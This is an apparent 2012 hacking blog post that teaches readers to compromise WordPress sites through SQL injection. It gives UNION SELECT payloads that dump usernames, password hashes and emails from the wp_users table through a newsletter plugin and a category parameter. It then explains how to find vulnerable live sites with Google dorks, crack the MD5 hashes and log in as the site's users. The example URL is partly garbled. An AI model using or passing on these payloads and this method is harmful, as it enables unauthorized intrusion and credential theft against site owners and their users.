Friday, August 10, 2012

2:26 PM

wordpress SQL Injection Hacks

wordpress SQL Injection Hacks : Another Special Post :-) 

images (65×123)there are Million of  sites which hosted on wordpress. and i already posted Some Tutorials on wordpress Hacking You Can Check it here , so Its new Tutorial on wordpress 
hacking with SQL injections, lets see

Cilck here to heck List of wordpress SQL Injections

How To use it ? 
For Example 1st injection is "wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users--",index.php?cat=999%20UNION%20SELECT%20null,CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58)),null,null,null%20FROM%20wp_users/* Now Modify it into a Google Dork, For making Dork use "Inurl:injection's php or dire here" for example for this injection dork will be "inurl:wp-content/plugins/st_newsletter/stnl_iframe.php" Now Go to and type your modified dork and see the serach result the search result will be like this for dork        Reomve the words after iframe.php and put ur SQl injection here ... now the url will be,0x3a,user_pass,0x3a,user_email)+FROM+wp_users--You will got the use name and md5 coded password ... Crash the password using md5 decoding Tools and login here 
Note : The Process is same for all Injections is same ... cooment below if any dobught ..


Post a Comment